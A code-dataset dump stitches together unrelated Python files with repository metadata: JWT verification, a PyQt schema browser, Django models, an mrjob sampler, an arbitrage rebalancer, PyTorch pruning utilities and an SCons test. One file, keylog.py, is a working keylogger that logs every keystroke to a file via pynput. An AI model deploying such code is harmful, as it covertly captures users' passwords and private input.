See http://self-issued.info/docs/draft-jones-json-web-token.html.
Args:
jwt: string, A JWT.
certs: dict, Dictionary where values of public keys in PEM format.
audience: string, The audience, 'aud', that this JWT should contain. If
None then the JWT's 'aud' parameter is not verified.
Returns:
dict, The deserialized JSON payload in the JWT.
Raises:
AppIdentityError if any checks are failed.
"""
segments = jwt.split('.')
if (len(segments) != 3):
raise AppIdentityError(
'Wrong number of segments in token: %s' % jwt)
signed = '%s.%s' % (segments[0], segments[1])
signature = _urlsafe_b64decode(segments[2])
# Parse token.
json_body = _urlsafe_b64decode(segments[1])
try:
parsed = simplejson.loads(json_body)
except:
raise AppIdentityError('Can\'t parse token: %s' % json_body)
# Check signature.
verified = False
for (keyname, pem) in certs.items():
verifier = Verifier.from_string(pem, True)
if (verifier.verify(signed, signature)):
verified = True
break
if not verified:
raise AppIdentityError('Invalid token signature: %s' % jwt)
# Check creation timestamp.
iat = parsed.get('iat')
if iat is None:
raise AppIdentityError('No iat field in token: %s' % json_body)
earliest = iat - CLOCK_SKEW_SECS
# Check expiration timestamp.
now = long(time.time())
exp = parsed.get('exp')
if exp is None:
raise AppIdentityError('No exp field in token: %s' % json_body)
if exp >= now + MAX_TOKEN_LIFETIME_SECS:
raise AppIdentityError(
'exp field too far in future: %s' % json_body)
latest = exp + CLOCK_SKEW_SECS
if now < earliest:
raise AppIdentityError('Token used too early, %d < %d: %s' %
(now, earliest, json_body))
if now > latest:
raise AppIdentityError('Token used too late, %d > %d: %s' %
(now, latest, json_body))
# Check audience.
if audience is not None:
aud = parsed.get('aud')
if aud is None:
raise AppIdentityError('No aud field in token: %s' % json_body)
if aud != audience:
raise AppIdentityError('Wrong recipient, %s != %s: %s' %
(aud, audience, json_body))
return parsed
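# Illustrative sketch (not part of the original module): how the helpers above fit
# together. private_pem and public_certs are placeholders the caller must supply;
# see the docstrings above for the exact formats each crypto backend accepts.
def _example_sign_and_verify(private_pem, public_certs, audience):
  """Signs a payload with make_signed_jwt and verifies it again.
  public_certs maps key names to PEM strings, as expected by
  verify_signed_jwt_with_certs above.
  """
  signer = Signer.from_string(private_pem)
  now = long(time.time())
  payload = {'aud': audience, 'iat': now, 'exp': now + 3600}
  token = make_signed_jwt(signer, payload)
  return verify_signed_jwt_with_certs(token, public_certs, audience)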
| 27.234257
| 80
| 0.661487
|
2c934d65a52053af9a36cfae28b9a50a26a4be7b
| 3,527
|
py
|
Python
|
gis4wrf/plugin/ui/browser_nml_schema.py
|
XavierCLL/gis4wrf
|
686b167d656f5f1835858f1b94de4423091f957c
|
[
"MIT"
] | 1
|
2018-09-09T16:40:18.000Z
|
2018-09-09T16:40:18.000Z
|
gis4wrf/plugin/ui/browser_nml_schema.py
|
mostamndi/gis4wrf
|
93eb69e5f2e87e9805dcaf8fee05db0228fd81c4
|
[
"MIT"
] | null | null | null |
gis4wrf/plugin/ui/browser_nml_schema.py
|
mostamndi/gis4wrf
|
93eb69e5f2e87e9805dcaf8fee05db0228fd81c4
|
[
"MIT"
] | 1
|
2019-11-10T04:52:35.000Z
|
2019-11-10T04:52:35.000Z
|
from typing import Tuple, Set, Any
from PyQt5.QtWidgets import QTextBrowser
class NmlSchemaBrowser(QTextBrowser):
def __init__(self, nml_schema: dict):
super().__init__()
html, self.anchors = get_schema_html(nml_schema)
# TODO set encoding of help page, e.g. degree symbol appears incorrect
self.setText(html)
def to_fortran(val: Any) -> str:
if val is True:
return '.true.'
if val is False:
return '.false.'
if isinstance(val, str):
val = f"'{val}'"
return str(val)
def get_schema_html(nml_schema: dict) -> Tuple[str, Set[str]]:
nml_html = '<html>'
anchors = set() # type: Set[str]
for section_name, section in nml_schema.items():
anchors.add(section_name)
nml_html += f'<h2><a name="{section_name}">&{section_name}</a></h2>'
for var_name, variable in section.items():
anchors.add(var_name)
description = variable['description']
type_ = variable['type']
item_type = variable.get('itemtype')
min_len = variable.get('minlen')
min_ = variable.get('min')
max_ = variable.get('max')
            type_label = type_
            if item_type:
                type_label += f' of {item_type}'
default = variable.get('default')
example = variable.get('example')
options = variable.get('options')
nml_html += f'<h3><a name="{var_name}">{var_name}</a></h3>'
nml_html += f'<p>{description}</p>'
            nml_html += f'Type: {type_label}<br>'
if min_len is not None:
if isinstance(min_len, str):
min_len = f'<a href="#{min_len}">{min_len}</a>'
nml_html += f'Length: {min_len}<br>'
if min_ is not None:
nml_html += f'Min: <code>{min_}</code><br>'
if max_ is not None:
nml_html += f'Max: <code>{max_}</code><br>'
if default is not None:
default_ = to_fortran(default)
if type_ == 'list':
if default == []:
                        nml_html += 'Default: empty list<br>'
                    else:
                        nml_html += f'Default: list of <code>{default_}</code><br>'
else:
nml_html += f'Default: <code>{default_}</code><br>'
if example is not None:
val_type = item_type if item_type else type_
if isinstance(example, str) and val_type != 'str':
# Here we have a literal example in Fortran syntax,
# so we avoid surrounding it with single quotes.
pass
else:
example = to_fortran(example)
nml_html += f'Example: <code>{example}</code><br>'
if options:
if isinstance(options, list):
nml_html += 'Options: <code>' + ', '.join(map(to_fortran, options)) + '</code><br>'
else:
nml_html += '<br>Options: <table border=1>'
for val, description in options.items():
val = to_fortran(val)
nml_html += f'<tr><td width="30%" align="center"><code>{val}</code></td>'
nml_html += f'<td width="70%">{description}</td></tr>'
nml_html += '</table>'
nml_html += '</html>'
return nml_html, anchors
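# Illustrative sketch (not part of the original module): a minimal, hand-written
# schema fragment showing what get_schema_html() expects and returns. The section
# and variable names below are made up for the example.
def _example_schema_html() -> Tuple[str, Set[str]]:
    schema = {
        'example_section': {
            'example_var': {
                'description': 'Number of grid points in the x-direction',
                'type': 'int',
                'min': 1,
                'example': 100,
            }
        }
    }
    html, anchors = get_schema_html(schema)
    # anchors == {'example_section', 'example_var'}; html holds the generated <h2>/<h3> markup.
    return html, anchors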
| 41.494118
| 103
| 0.505529
|
9bff0b8a0cf820bd81332f9046c79ea56b29a8f4
| 2,476
|
py
|
Python
|
froide/foisite/models.py
|
OpendataCH/froide
|
8136bac0d8caa56f9cfc7ba15480be987280e55d
|
[
"MIT"
] | null | null | null |
froide/foisite/models.py
|
OpendataCH/froide
|
8136bac0d8caa56f9cfc7ba15480be987280e55d
|
[
"MIT"
] | null | null | null |
froide/foisite/models.py
|
OpendataCH/froide
|
8136bac0d8caa56f9cfc7ba15480be987280e55d
|
[
"MIT"
] | null | null | null |
import logging
from django.conf import settings
from django.db import models
from django.dispatch import receiver
from django.utils.translation import gettext_lazy as _
logger = logging.getLogger(__name__)
class FoiSite(models.Model):
country_code = models.CharField(_("Country Code"), max_length=5)
country_name = models.CharField(_("Country Name"), max_length=255)
name = models.CharField(_("Name"), max_length=255)
url = models.CharField(_("URL"), max_length=255)
text = models.TextField(_("Text"), blank=True)
enabled = models.BooleanField(_("Enabled"), default=True)
class Meta:
verbose_name = _("FOI Site")
verbose_name_plural = _("FOI Sites")
def __str__(self):
return "%s (%s)" % (self.name, self.country_name)
def save(self, *args, **kwargs):
self.country_code = self.country_code.upper()
super(FoiSite, self).save(*args, **kwargs)
try:
from django.contrib.gis.geoip2 import GeoIP2
except ImportError:
GeoIP2 = None # noqa
class SiteAdivsor(object):
def __init__(self):
self.geoip = self.get_geoip()
self.sites = None
def get_geoip(self):
if GeoIP2 is None:
return None
try:
return GeoIP2()
except Exception as e:
logger.exception(e)
def update(self):
sites = FoiSite.objects.filter(enabled=True)
self.sites = dict([(f.country_code, f) for f in sites])
def refresh(self):
self.sites = None
def get_site(self, ip):
if self.sites is None:
self.update()
if ip == "127.0.0.1":
return None
try:
if self.geoip is None:
self.geoip = self.get_geoip()
if self.geoip is None:
return
result = self.geoip.country(ip)
except Exception as e:
logger.warning(e)
# try recreating the geoIP2 object
self.geoip = self.get_geoip()
return None
return self.sites.get(result["country_code"], None)
class DummyAdvisor(object):
def refresh(self):
pass
def get_site(self, ip):
pass
if GeoIP2 and getattr(settings, "GEOIP_PATH", False):
advisor = SiteAdivsor()
else:
advisor = DummyAdvisor()
@receiver(models.signals.post_save, sender=FoiSite, dispatch_uid="foisite_saved")
def foisite_saved(instance=None, created=False, **kwargs):
advisor.refresh()
| 26.623656
| 81
| 0.623183
|
adf5494c5d195fe63cdc1522ba29c7002769652a
| 380
|
py
|
Python
|
keylog.py
|
trackmastersteve/keylogger
|
3870f32ff44e12206ff343dbf6f6e330ce3909df
|
[
"MIT"
] | 1
|
2018-10-10T00:41:40.000Z
|
2018-10-10T00:41:40.000Z
|
keylog.py
|
trackmastersteve/keylogger
|
3870f32ff44e12206ff343dbf6f6e330ce3909df
|
[
"MIT"
] | null | null | null |
keylog.py
|
trackmastersteve/keylogger
|
3870f32ff44e12206ff343dbf6f6e330ce3909df
|
[
"MIT"
] | null | null | null |
# keylogger.py
from pynput.keyboard import Key, Listener
import logging
log_dir = ""
logging.basicConfig(filename=(log_dir + "keylog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s:')
def on_press(key):
logging.info(str(key))
#if key == Key.esc:
#return False # Stop listener
with Listener(on_press=on_press) as listener:
listener.join()
| 23.75
| 112
| 0.692105
|
92a62dff0c82d94fc3374f160672012b712e8b43
| 3,837
|
py
|
Python
|
utils/net_utils.py
|
isamu-isozaki/hidden-networks
|
7dcb96a7de43b65ffde176d771f88b5ecedb84ab
|
[
"Apache-2.0"
] | 132
|
2019-12-03T19:02:36.000Z
|
2022-03-27T15:56:43.000Z
|
utils/net_utils.py
|
isamu-isozaki/hidden-networks
|
7dcb96a7de43b65ffde176d771f88b5ecedb84ab
|
[
"Apache-2.0"
] | 9
|
2019-12-05T16:28:33.000Z
|
2022-02-21T21:49:13.000Z
|
utils/net_utils.py
|
isamu-isozaki/hidden-networks
|
7dcb96a7de43b65ffde176d771f88b5ecedb84ab
|
[
"Apache-2.0"
] | 45
|
2019-12-04T00:11:53.000Z
|
2022-03-30T21:07:37.000Z
|
from functools import partial
import os
import pathlib
import shutil
import math
import torch
import torch.nn as nn
def save_checkpoint(state, is_best, filename="checkpoint.pth", save=False):
filename = pathlib.Path(filename)
if not filename.parent.exists():
os.makedirs(filename.parent)
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, str(filename.parent / "model_best.pth"))
if not save:
os.remove(filename)
def get_lr(optimizer):
return optimizer.param_groups[0]["lr"]
def freeze_model_weights(model):
print("=> Freezing model weights")
for n, m in model.named_modules():
if hasattr(m, "weight") and m.weight is not None:
print(f"==> No gradient to {n}.weight")
m.weight.requires_grad = False
if m.weight.grad is not None:
print(f"==> Setting gradient of {n}.weight to None")
m.weight.grad = None
if hasattr(m, "bias") and m.bias is not None:
print(f"==> No gradient to {n}.bias")
m.bias.requires_grad = False
if m.bias.grad is not None:
print(f"==> Setting gradient of {n}.bias to None")
m.bias.grad = None
def freeze_model_subnet(model):
print("=> Freezing model subnet")
for n, m in model.named_modules():
if hasattr(m, "scores"):
m.scores.requires_grad = False
print(f"==> No gradient to {n}.scores")
if m.scores.grad is not None:
print(f"==> Setting gradient of {n}.scores to None")
m.scores.grad = None
def unfreeze_model_weights(model):
print("=> Unfreezing model weights")
for n, m in model.named_modules():
if hasattr(m, "weight") and m.weight is not None:
print(f"==> Gradient to {n}.weight")
m.weight.requires_grad = True
if hasattr(m, "bias") and m.bias is not None:
print(f"==> Gradient to {n}.bias")
m.bias.requires_grad = True
def unfreeze_model_subnet(model):
print("=> Unfreezing model subnet")
for n, m in model.named_modules():
if hasattr(m, "scores"):
print(f"==> Gradient to {n}.scores")
m.scores.requires_grad = True
def set_model_prune_rate(model, prune_rate):
print(f"==> Setting prune rate of network to {prune_rate}")
for n, m in model.named_modules():
if hasattr(m, "set_prune_rate"):
m.set_prune_rate(prune_rate)
print(f"==> Setting prune rate of {n} to {prune_rate}")
def accumulate(model, f):
acc = 0.0
for child in model.children():
acc += accumulate(child, f)
acc += f(model)
return acc
class LabelSmoothing(nn.Module):
"""
NLL loss with label smoothing.
"""
def __init__(self, smoothing=0.0):
"""
Constructor for the LabelSmoothing module.
:param smoothing: label smoothing factor
"""
super(LabelSmoothing, self).__init__()
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
def forward(self, x, target):
logprobs = torch.nn.functional.log_softmax(x, dim=-1)
nll_loss = -logprobs.gather(dim=-1, index=target.unsqueeze(1))
nll_loss = nll_loss.squeeze(1)
smooth_loss = -logprobs.mean(dim=-1)
loss = self.confidence * nll_loss + self.smoothing * smooth_loss
return loss.mean()
class SubnetL1RegLoss(nn.Module):
def __init__(self):
super().__init__()
def forward(self, model, temperature=1.0):
l1_accum = 0.0
for n, p in model.named_parameters():
if n.endswith("scores"):
l1_accum += (p*temperature).sigmoid().sum()
return l1_accum
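# Illustrative usage sketch (not part of the original file): LabelSmoothing takes raw
# logits and integer class labels; with smoothing=0.0 it reduces to the usual NLL loss
# on log-softmax outputs.
if __name__ == "__main__":
    criterion = LabelSmoothing(smoothing=0.1)
    logits = torch.randn(8, 5)           # batch of 8 samples, 5 classes
    targets = torch.randint(0, 5, (8,))  # integer class labels in [0, 5)
    print(criterion(logits, targets).item())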
| 27.604317
| 75
| 0.593954
|
9091ee732a1e387a39ab13e63f41e1d4618c9c14
| 3,405
|
py
|
Python
|
samplecdxjob.py
|
ikreymer/webarchive-indexing
|
2cfe14dbd86be78b3710c98744503f8a34dd76a5
|
[
"MIT"
] | 35
|
2015-03-09T23:47:07.000Z
|
2021-04-19T11:40:48.000Z
|
samplecdxjob.py
|
ikreymer/webarchive-indexing
|
2cfe14dbd86be78b3710c98744503f8a34dd76a5
|
[
"MIT"
] | 10
|
2015-03-13T01:07:47.000Z
|
2018-10-18T15:07:24.000Z
|
samplecdxjob.py
|
ikreymer/webarchive-indexing
|
2cfe14dbd86be78b3710c98744503f8a34dd76a5
|
[
"MIT"
] | 7
|
2015-06-11T16:59:26.000Z
|
2017-12-04T12:48:40.000Z
|
import random
from heapq import heappush, heapreplace
from mrjob.job import MRJob
from mrjob.protocol import RawValueProtocol
#=============================================================================
class SampleCDXJob(MRJob):
""" Sample CDX key space using reservoir sampling
MR algorithm adapted:
http://had00b.blogspot.com/2013/07/random-subset-in-mapreduce.html
"""
HADOOP_INPUT_FORMAT = 'org.apache.hadoop.mapred.lib.CombineTextInputFormat'
INPUT_PROTOCOL = RawValueProtocol
OUTPUT_PROTOCOL = RawValueProtocol
JOBCONF = {'mapreduce.task.timeout': '9600000',
'mapreduce.input.fileinputformat.split.maxsize': '50000000',
'mapreduce.map.speculative': 'false',
'mapreduce.reduce.speculative': 'false',
'mapreduce.job.jvm.numtasks': '-1',
# the output should not be compressed even if the default is to compress output,
# otherwise reading from MRJobRunner.stream_output() needs decompression on the fly
'mapreduce.output.fileoutputformat.compress': 'false',
'mapreduce.job.reduces': '1'
}
def configure_options(self):
"""Custom command line options for indexing"""
super(SampleCDXJob, self).configure_options()
self.add_passthrough_option('--shards', dest='shards',
type=int,
default=300,
help='Number of shards in output ' +
'(create shards-1 splits')
self.add_passthrough_option('--scaler', dest='scaler',
type=int,
default=100,
help='Scaler for sample size: ' +
'Sample size = shards * scaler')
self.add_passthrough_option('--splitfile', dest='splitfile',
help='Split file output dest, ' +
'will contain shards-1 splits')
def mapper_init(self):
self.N = self.options.shards * self.options.scaler
self.H = []
def mapper(self, _, line):
line = line.split('\t')[-1]
if line.startswith(' CDX'):
return
r = random.random()
if len(self.H) < self.N:
heappush(self.H, (r, line))
elif r > self.H[0][0]:
heapreplace(self.H, (r, line))
def mapper_final(self):
for (r, x) in self.H:
# by negating the id, the reducer receives
# the elements from highest to lowest
yield -r, x
def reducer_init(self):
self.N = self.options.shards * self.options.scaler
self.output_list = []
def reducer(self, key, values):
for x in values:
if len(self.output_list) >= self.N:
return
self.output_list.append(x)
def reducer_final(self):
# sample sorted list by scaler, skip first element
# to get a N-1 even samples from N*SCALER set
self.output_list = sorted(self.output_list)
self.output_list = self.output_list[0::self.options.scaler][1:]
for x in self.output_list:
yield '', x
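# Illustrative sketch (not part of the original job): the same weighted-reservoir idea
# used by mapper()/mapper_final() above, written against a plain iterable so the
# algorithm can be read without the MapReduce plumbing.
def reservoir_sample(lines, n):
    heap = []
    for line in lines:
        r = random.random()
        if len(heap) < n:
            heappush(heap, (r, line))
        elif r > heap[0][0]:
            heapreplace(heap, (r, line))
    # keep only the sampled lines; the random keys are discarded
    return [line for (_r, line) in heap]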
if __name__ == "__main__":
SampleCDXJob().run()
| 34.744898
| 99
| 0.537445
|
55cbb8568d9993b1c86ec5440d480cfb230386b0
| 5,162
|
py
|
Python
|
GUI/gui.py
|
KonstantinosKaratzidis/ActivePlant
|
3ae7b5ac9986a7510819753ba93984f59ee060ae
|
[
"MIT"
] | null | null | null |
GUI/gui.py
|
KonstantinosKaratzidis/ActivePlant
|
3ae7b5ac9986a7510819753ba93984f59ee060ae
|
[
"MIT"
] | null | null | null |
GUI/gui.py
|
KonstantinosKaratzidis/ActivePlant
|
3ae7b5ac9986a7510819753ba93984f59ee060ae
|
[
"MIT"
] | null | null | null |
from PyQt5.QtWidgets import QApplication, QMainWindow
from generated.main_window import Ui_MainWindow
from port_selector import PortSelector
from fatal import FatalMessage
from plant import Plant, import_plants
from proto import PlantConnection, ResponseTimeout
from settings import Settings
import time
from serial import Serial
from serial.tools.list_ports import comports
from sys import argv
MAX_MOISTURE = 1024
MAX_WATER_LEVEL = 4
class MainWindow(QMainWindow):
def __init__(self, *args):
super().__init__(*args)
self.conn = None
self.plants = import_plants()
self._window = Ui_MainWindow()
self._window.setupUi(self)
self.rightColumn = self._window.rightColumn
self.leftColumn = self._window.leftColumn
self.connectionLabel = self._window.statusLabel
self.waterBar = self._window.waterLevelBar
self.moistureBar = self._window.moistureLevelBar
self._set_ranges()
self.set_water(0)
self.set_moisture(0)
self.plantsList = self._window.plantsList
self.currentPlant = None
self.set_disconnected()
self.set_plants()
self.plantsList.currentRowChanged.connect(self.set_selected_plant)
self._window.refreshButton.clicked.connect(self.set_selected_plant)
self._window.changeSettingsButton.clicked.connect(self.changeSettings)
self.targetMoisture = 0
self.waterInterval = 0
def setConnection(self, plantConnection):
self.conn = plantConnection
def _set_ranges(self):
self.waterBar.setMaximum(MAX_WATER_LEVEL)
self.moistureBar.setMaximum(MAX_MOISTURE)
def changeSettings(self):
dialog = Settings(self.targetMoisture, self.waterInterval, self)
dialog.settingsChanged.connect(self.setNewSettings)
dialog.show()
def setNewSettings(self, target_moisture, water_interval):
index = self.plantsList.currentRow()
plant = self.plants[index]
print("set new settings", hex(plant.address), target_moisture, water_interval)
self.set_disconnected()
try:
self.conn.write_moisture_wanted(plant.address, target_moisture)
self.conn.write_water_interval(plant.address, water_interval)
self.set_selected_plant(index)
self.set_connected()
except ResponseTimeout:
print("Failed to set new settings")
self.set_disconnected()
def set_water(self, value):
        self.waterBar.setValue(value)
def set_moisture(self, value):
self.moistureBar.setValue(value)
def set_target_moisture(self, target_moisture):
self._window.targetMoistureLabel.setText(str(target_moisture))
self.targetMoisture = target_moisture
def set_water_interval(self, water_interval):
self._window.wateringMethodLabel.setText(str(water_interval))
self.waterInterval = water_interval
def set_status(self, water_level, moisture_level, target_moisture, water_interval):
self.set_water(water_level)
self.set_moisture(moisture_level)
self.set_target_moisture(target_moisture)
self.set_water_interval(water_interval)
def set_connected(self):
self.rightColumn.setEnabled(True)
self.connectionLabel.setText("Connected")
self.connectionLabel.setStyleSheet("QLabel {color : green;}")
def set_disconnected(self):
self.rightColumn.setEnabled(False)
self.connectionLabel.setText("Disconnected")
self.connectionLabel.setStyleSheet("QLabel {color : red;}")
def set_plants(self):
for plant in self.plants:
self.plantsList.addItem(plant.name)
def set_selected_plant(self, index):
plant = self.plants[index]
self.currentPlant = plant
try:
self.conn.ping(plant.address)
moisture = self.conn.read_moisture(plant.address)
water_level = self.conn.read_water_level(plant.address)
target_moisture = self.conn.read_moisture_wanted(plant.address)
water_interval = self.conn.read_water_interval(plant.address)
self.set_status(water_level, moisture, target_moisture, water_interval)
self.set_connected()
except ResponseTimeout:
print("Failed to ping device")
self.set_disconnected()
class App(QApplication):
def __init__(self, *args):
super().__init__(*args)
plants = [Plant("Plant 1", 0xa0), Plant("Plant 2", 0xb0)]
available_ports = list([port.device for port in comports()])
self.portSelector = PortSelector(available_ports)
self.portSelector.show()
self.portSelector.portSelected.connect(self.set_port)
self.portSelector.canceled.connect(self.quit)
self.main_win = MainWindow()
def set_port(self, portName):
self.portSelector.close()
connection = PlantConnection(0x01, Serial(portName, timeout = 2), 2)
self.main_win.show()
self.main_win.setConnection(connection)
if __name__ == "__main__":
app = App(argv)
app.exec_()
| 34.413333
| 87
| 0.691592
|
4ba57fdd5c31312965c809f2cb7510719a78d427
| 5,944
|
py
|
Python
|
Arbitrage/ArbitrageBot/rebalancing.py
|
LabMazurokCom/Blockchain
|
6f0d8a2ce52434b70e698ce0cc75e46f442daa1c
|
[
"MIT"
] | 13
|
2018-04-05T11:56:04.000Z
|
2021-01-13T02:39:47.000Z
|
Arbitrage/ArbitrageBot/rebalancing.py
|
LabMazurokCom/Blockchain
|
6f0d8a2ce52434b70e698ce0cc75e46f442daa1c
|
[
"MIT"
] | 40
|
2018-03-28T14:14:19.000Z
|
2018-07-11T12:46:21.000Z
|
Arbitrage/ArbitrageBot/rebalancing.py
|
LabMazurokCom/Blockchain
|
6f0d8a2ce52434b70e698ce0cc75e46f442daa1c
|
[
"MIT"
] | 8
|
2018-05-30T19:45:08.000Z
|
2021-01-23T14:34:01.000Z
|
import datetime
import os
File = os.path.basename(__file__)
EPS = 1e-8
def make_orders(order_books, pair, current_balance, need_base, need_quote):
"""
makes orders to rebalance assets
:param order_books: see example at the beginning of this file
:param pair: pair or currencies to balance assets for
:param need_base: desired amount base currency
:param need_quote: desired amount of quote currency
:return: our_orders
"""
our_orders = dict()
# current_balance = copy.deepcopy(current_balance)
currencies = pair.split('_')
base_cur = currencies[0] # base currency of current pair (BTC for BTC/USD)
quote_cur = currencies[1] # quote currency of current pair (USD for BTC/USD)
# print(pair, base_cur, quote_cur)
ax = 0
bx = 0
asks = order_books[pair]['asks']
bids = order_books[pair]['bids']
ask_count = len(asks)
bid_count = len(bids)
base_amount = 0 # required amount of base currency
quote_amount = 0 # required amount of quote currency
sell_orders = {} # all sell_orders for current pair
buy_orders = {} # all buy_orders for current pair
if need_base != 0.0: # BUY
while ax < ask_count and need_base > EPS:
ask_price = asks[ax][0]
if ask_price < EPS:
ax += 1
continue
ask_vol = asks[ax][1]
if ask_vol < EPS:
ax += 1
continue
ask_price_real = asks[ax][2]
ask_exch = asks[ax][3] # BID: base -> quote
ask_bal = current_balance[ask_exch][quote_cur]
if ask_bal < EPS:
ax += 1
continue
try:
m = min(ask_vol, ask_bal / ask_price_real, need_base) # current micro-trade volume
if m < EPS:
ax += 1
continue
need_base -= m
asks[ax][1] -= m
current_balance[ask_exch][quote_cur] -= m * ask_price_real
except ZeroDivisionError as e:
Time = datetime.datetime.utcnow()
EventType = "ZeroDivisionError"
Function = "get_arb_opp"
Explanation = "ask_price_real is equal to 0"
EventText = e
ExceptionType = type(e)
print("{}|{}|{}|{}|{}|{}|{}".format(Time, EventType, Function, File, Explanation, EventText,
ExceptionType))
break
if ask_exch in buy_orders:
buy_orders[ask_exch][0] = max(buy_orders[ask_exch][0], ask_price_real)
buy_orders[ask_exch][1] += m
else:
buy_orders[ask_exch] = [ask_price_real, m]
else: #SELL
m = 0
while bx < bid_count and need_quote > 1e-4:
bid_price = bids[bx][0]
if bid_price < EPS:
bx += 1
continue
bid_vol = bids[bx][1]
if bid_vol < EPS:
bx += 1
continue
bid_price_real = bids[bx][2]
bid_exch = bids[bx][3] # ASK: quote -> base
bid_bal = current_balance[bid_exch][base_cur]
if bid_bal < EPS:
bx += 1
continue
m = min(bid_vol, bid_bal, need_quote / bid_price_real) # current micro-trade volume
if m < EPS:
bx += 1
continue
need_quote -= bid_price * m
bids[bx][1] -= m
current_balance[bid_exch][base_cur] -= m
if bid_exch in sell_orders:
sell_orders[bid_exch][0] = min(sell_orders[bid_exch][0], bid_price_real)
sell_orders[bid_exch][1] += m
else:
sell_orders[bid_exch] = [bid_price_real, m]
our_orders = {}
our_orders['buy'] = buy_orders
our_orders['sell'] = sell_orders
our_orders['required_base_amount'] = base_amount
our_orders['required_quote_amount'] = quote_amount
our_orders['profit'] = 0
return our_orders
def rebalance(data, order_books, total_balances, balances):
ok = False
orders = {}
cur_pair = ''
try:
for pair in data:
cnt = 0
rate = 0
for exch in data[pair]:
if len(data[pair][exch]['bids']) != 0 and len(data[pair][exch]['asks']) != 0:
rate += float(data[pair][exch]['bids'][0][2])
rate += float(data[pair][exch]['asks'][0][2])
cnt += 2
if cnt == 0:
continue
rate /= cnt
base, quote = pair.split('_')
if total_balances[base] == 0.0 and total_balances[quote] == 0.0:
continue
minvol, maxvol = min(total_balances[base] * rate, total_balances[quote]), max(total_balances[base] * rate, total_balances[quote])
if minvol / maxvol < 0.8:
ok = True
cur_pair = pair
if total_balances[base] * rate < total_balances[quote]:
orders = make_orders(order_books, pair, balances, need_base=(total_balances[quote] - total_balances[base] * rate) / 2 / rate, need_quote=0.0)
else:
orders = make_orders(order_books, pair, balances, need_base=0.0, need_quote=(total_balances[base] * rate - total_balances[quote]) / 2)
except Exception as e:
Time = datetime.datetime.utcnow()
EventType = "Error"
Function = "rebalance"
Explanation = "Fail while getting rates for currencies"
EventText = e
ExceptionType = type(e)
print("{}|{}|{}|{}|{}|{}|{}".format(Time, EventType, Function, File, Explanation, EventText,
ExceptionType))
return ok, cur_pair, orders
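# Illustrative sketch (not part of the original module): the shapes make_orders()
# expects, reconstructed from how the function indexes its arguments (the example
# referred to in the docstring is not shown here). Exchange and pair names are made up.
def _example_make_orders_call():
    order_books = {
        'BTC_USD': {
            # each level: [price, volume, real_price, exchange]
            'asks': [[7000.0, 0.5, 7003.5, 'exchange_a']],
            'bids': [[6990.0, 0.4, 6986.5, 'exchange_b']],
        }
    }
    balances = {
        'exchange_a': {'BTC': 0.10, 'USD': 500.0},
        'exchange_b': {'BTC': 0.20, 'USD': 100.0},
    }
    # buy 0.05 BTC of the base currency to move the balances closer together
    return make_orders(order_books, 'BTC_USD', balances, need_base=0.05, need_quote=0.0)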
| 34.760234
| 161
| 0.533311
|
5bda013b86910213b9a272609eb95118774b6d52
| 537
|
py
|
Python
|
wordcount/wcount/views.py
|
chandansau/wordcount-
|
38df4d189ca2a745dde7977fc18518b371935f03
|
[
"MIT"
] | null | null | null |
wordcount/wcount/views.py
|
chandansau/wordcount-
|
38df4d189ca2a745dde7977fc18518b371935f03
|
[
"MIT"
] | null | null | null |
wordcount/wcount/views.py
|
chandansau/wordcount-
|
38df4d189ca2a745dde7977fc18518b371935f03
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
def home(request):
return render(request,"home.html")
def count(request):
fulltext=request.GET['fulltext']
wordlist=fulltext.split()
worddictionary= {}
for word in wordlist:
if word in worddictionary:
worddictionary[word] += 1
else:
worddictionary[word] = 1
return render(request,"count.html",{'fulltext':fulltext,'count':len(wordlist),'worddictionary':worddictionary.items()})
| 28.263158
| 124
| 0.659218
|
7c8973b7f4c3f097a06e5e03fdc0dcd276824755
| 5,085
|
py
|
Python
|
test/Variables/ListVariable.py
|
EmanueleCannizzaro/scons
|
6baa4e65cdf4df6951473545b69435711864e509
|
[
"MIT"
] | 1
|
2019-09-18T06:37:02.000Z
|
2019-09-18T06:37:02.000Z
|
test/Variables/ListVariable.py
|
EmanueleCannizzaro/scons
|
6baa4e65cdf4df6951473545b69435711864e509
|
[
"MIT"
] | null | null | null |
test/Variables/ListVariable.py
|
EmanueleCannizzaro/scons
|
6baa4e65cdf4df6951473545b69435711864e509
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Variables/ListVariable.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Test the ListVariable canned Variable type.
"""
import os
import TestSCons
test = TestSCons.TestSCons()
SConstruct_path = test.workpath('SConstruct')
def check(expect):
result = test.stdout().split('\n')
r = result[1:len(expect)+1]
assert r == expect, (r, expect)
test.write(SConstruct_path, """\
from SCons.Variables.ListVariable import ListVariable
LV = ListVariable
from SCons.Variables import ListVariable
list_of_libs = Split('x11 gl qt ical')
optsfile = 'scons.variables'
opts = Variables(optsfile, args=ARGUMENTS)
opts.AddVariables(
ListVariable('shared',
'libraries to build as shared libraries',
'all',
names = list_of_libs,
map = {'GL':'gl', 'QT':'qt'}),
LV('listvariable', 'listvariable help', 'all', names=['l1', 'l2', 'l3'])
)
env = Environment(variables=opts)
opts.Save(optsfile, env)
Help(opts.GenerateHelpText(env))
print env['shared']
if 'ical' in env['shared']: print '1'
else: print '0'
for x in env['shared']:
